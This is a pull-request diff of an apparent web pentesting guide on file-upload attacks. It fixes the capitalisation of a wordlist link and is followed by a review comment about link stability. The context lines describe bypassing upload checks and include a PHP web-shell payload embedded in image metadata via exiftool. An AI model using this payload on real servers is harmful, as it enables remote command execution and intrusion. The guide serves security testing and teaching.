Merge pull request #897 from shad0w0lf/patch-1
Update README.md
carlospolop authored Jul 20, 2024
2 parents ad95e60 + 80e6aa2 commit c79ed6b
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion pentesting-web/file-upload/README.md
Expand Up @@ -81,7 +81,7 @@ Other useful extensions:
### Bypass Content-Type, Magic Number, Compression & Resizing
* Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt)
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
* Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` or you could also **introduce the payload directly** in an image:\
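Review bot: The replaced wordlist link still targets the `master` branch of SecLists, so a path change as small as `Miscellaneous/web/` becoming `Miscellaneous/Web/` is enough to break it again, and nothing in this README will flag that. Consider pointing the link at a commit permalink, and confirm that both the link text and the link target resolve before merging, since the two are edited separately and the path is case-sensitive. A smaller style point on the unchanged bullet just above the changed line: the emphasis in `_image/png_ , _text/plain , application/octet-stream_` is unbalanced and could be tidied in the same patch.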
